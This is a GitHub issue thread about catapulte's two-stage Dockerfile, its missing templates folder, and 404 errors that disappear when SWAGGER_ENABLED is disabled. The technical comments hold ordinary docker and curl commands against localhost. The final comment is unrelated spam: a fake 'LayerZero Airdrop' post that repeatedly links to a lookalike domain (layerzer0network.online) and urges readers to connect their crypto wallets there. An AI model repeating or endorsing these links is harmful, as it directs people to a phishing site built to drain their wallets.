### ISSUE TITLE
Please explain how the Dockerfile works

### ISSUE THREAD

**Issue by guidoffm** [jdrouet/catapulte#171]
You have a two stage build in the Dockerfile.

In stage one you copy the `template` folder to `/code/template` and run the `cargo` command.

Then, in stage two, you only copy the binary file to `/usr/bin/catapulte`.

You set the env variable `TEMPLATE_ROOT` to `/templates`.

Of course there is no such `/templates` folder.

I guess the templates folder from stage one is gone now.

**Comment by guidoffm** [comment]
After mounting the templates in the container the files are in their place:

```
$ find /templates/
/templates/
/templates/user-login
/templates/user-login/template.mjml
/templates/user-login/metadata.json
```

After doing a `curl` 

```
curl -v \
        -H "Content-Type: application/json" \
        -X POST \
        --data "{\"from\":\"alice@example.com\",\"to\":\"bob@example.com\",\"params\":{\"name\":\"bob\",\"token\":\"abcdefgh\"}}" \
        http://localhost:58822/templates/user-login
```

I just get a 404.

**Comment by jdrouet** [comment]
Hi!
Could you show me the command you used to start the container and the result from the curl?

**Comment by lrfuentesw** [comment]
Hey @jdrouet . When a i tested this i got a similar error. In my case i used this to run the docker image (took it from readme):
```
docker run -d \
  --name catapulte \
  -e SMTP_HOSTNAME=localhost \
  -e SMTP_PORT=25 \
  -e SMTP_USERNAME=optional \
  -e SMTP_PASSWORD=optional \
  -e SMTP_TLS_ENABLED=true \
  -e SWAGGER_ENABLED=true \
  -e TEMPLATE_PROVIDER=local \
  -e TEMPLATE_ROOT=/templates \
  -p 3000:3000 \
  -v /path/to/your/templates:/templates:ro \
  jdrouet/catapulte:master
```
And it wasnt 'til i removed the SWAGGER_ENABLED variable that it worked. Hope this help

**Comment by guidoffm** [comment]
I can acknowledge that setting SWAGGER_ENABLED to false avoids the 404 error. So something might be wrong with your swagger config.

**Comment by guidoffm** [comment]
To get back to the original question:

Dockerfile line 12 reads: `COPY template /code/template`

When I get you right this line does not make sense. Or is it used during compilation/packaging in any way?

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
